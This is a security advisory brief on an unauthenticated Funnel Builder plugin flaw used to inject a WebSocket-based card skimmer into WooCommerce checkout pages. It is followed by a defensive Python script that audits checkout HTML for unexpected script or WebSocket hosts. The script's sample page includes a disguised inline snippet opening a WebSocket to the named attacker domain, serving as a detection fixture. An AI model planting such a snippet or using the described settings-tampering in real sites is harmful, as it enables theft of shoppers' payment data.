Critical Funnel Builder WordPress Plugin Flaw Enables Credit‑Card Skimming on 40k WooCommerce Sites
What Happened – A vulnerability in the Funnel Builder plugin for WordPress (versions before 3.15.0.3), exploitable without any authentication, was weaponised to inject malicious JavaScript into WooCommerce checkout pages. The injected script loads a remote skimmer that harvests full payment‑card details and billing data.
Why It Matters for TPRM –
- The plugin is deployed on >40,000 e‑commerce sites, creating a massive supply‑chain exposure.
- Attackers can steal PCI‑sensitive data without any user interaction, bypassing traditional web‑application firewalls.
- The breach demonstrates how a single third‑party component can compromise the entire merchant ecosystem.
Who Is Affected – Retail & e‑commerce organisations using WordPress/WooCommerce that have the Funnel Builder plugin installed (any industry that runs an online store).
Recommended Actions –
- Verify whether the Funnel Builder plugin is present on any managed sites.
- Immediately upgrade to version 3.15.0.3 or later via the WordPress dashboard.
- Audit the “External Scripts” setting for rogue entries and remove any unknown URLs.
- Conduct a PCI‑DSS scope review to ensure that any compromised sites are re‑validated.
Technical Notes – The flaw is an unauthenticated “settings‑tampering” bug that lets an attacker write arbitrary JavaScript to the plugin’s global “External Scripts” field. The malicious payload masquerades as a Google Tag Manager script and opens a WebSocket to protect-wss.com, delivering a custom card‑skimmer that captures card numbers, CVVs, billing addresses, and other PII. No CVE ID has been assigned yet.
Source: BleepingComputer
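One way to carry out the External Scripts audit recommended above against a rendered checkout page, as an added example written for this brief (not code from the Funnel Builder project or from the BleepingComputer report): it assumes a per-site allowlist of script hosts (ALLOWED_SCRIPT_HOSTS, adjust for your own tag and CDN hosts) and runs over a constructed HTML sample; protect-wss.com is the domain named in the Technical Notes.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse
# Assumed allowlist of hosts a checkout page legitimately loads scripts from; tune per site.
ALLOWED_SCRIPT_HOSTS = {"www.googletagmanager.com", "www.google-analytics.com", "shop.example"}
# Matches WebSocket constructor calls in inline JavaScript and captures the target URL.
WS_RE = re.compile(r"""new\s+WebSocket\s*\(\s*["'](wss?://[^"']+)["']""", re.IGNORECASE)

class _ScriptCollector(HTMLParser):
    """Collects (src, inline_body) for every <script> element in a page."""
    def __init__(self):
        super().__init__()
        self.scripts, self._src, self._body, self._in_script = [], None, [], False
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script, self._src, self._body = True, dict(attrs).get("src"), []
    def handle_data(self, data):
        if self._in_script:          # HTMLParser hands script bodies over as raw data
            self._body.append(data)
    def handle_endtag(self, tag):
        if tag == "script":
            self.scripts.append((self._src, "".join(self._body)))
            self._in_script = False

def audit_checkout_scripts(html, allowed=ALLOWED_SCRIPT_HOSTS):
    """Return (finding_type, host) pairs for scripts loaded from, or WebSockets opened to,
    hosts outside the allowlist; an empty list means nothing unexpected was found."""
    parser = _ScriptCollector()
    parser.feed(html)
    findings = []
    for src, body in parser.scripts:
        if src:
            host = urlparse(src).hostname or ""
            if host not in allowed:
                findings.append(("external-script-from-unknown-host", host))
        for ws_url in WS_RE.findall(body):   # inline loaders that phone home over WebSocket
            host = urlparse(ws_url).hostname or ""
            if host not in allowed:
                findings.append(("websocket-to-unknown-host", host))
    return findings

# Constructed checkout page: two legitimate scripts plus an inline block dressed up as a
# Tag Manager snippet that opens a WebSocket to the domain named in the report.
SAMPLE_CHECKOUT_HTML = """<html><head>
<script src="https://www.googletagmanager.com/gtm.js?id=GTM-PLACEHOLDER"></script>
<script src="https://shop.example/wp-content/plugins/woocommerce/assets/js/checkout.min.js"></script>
<script>/* Google Tag Manager */
var ws = new WebSocket("wss://protect-wss.com/ws");
</script>
</head><body>checkout</body></html>"""
```

Run it against the HTML of a live checkout page fetched as a customer would see it; a script src or WebSocket target outside the allowlist is the rogue entry to chase back to the plugin setting.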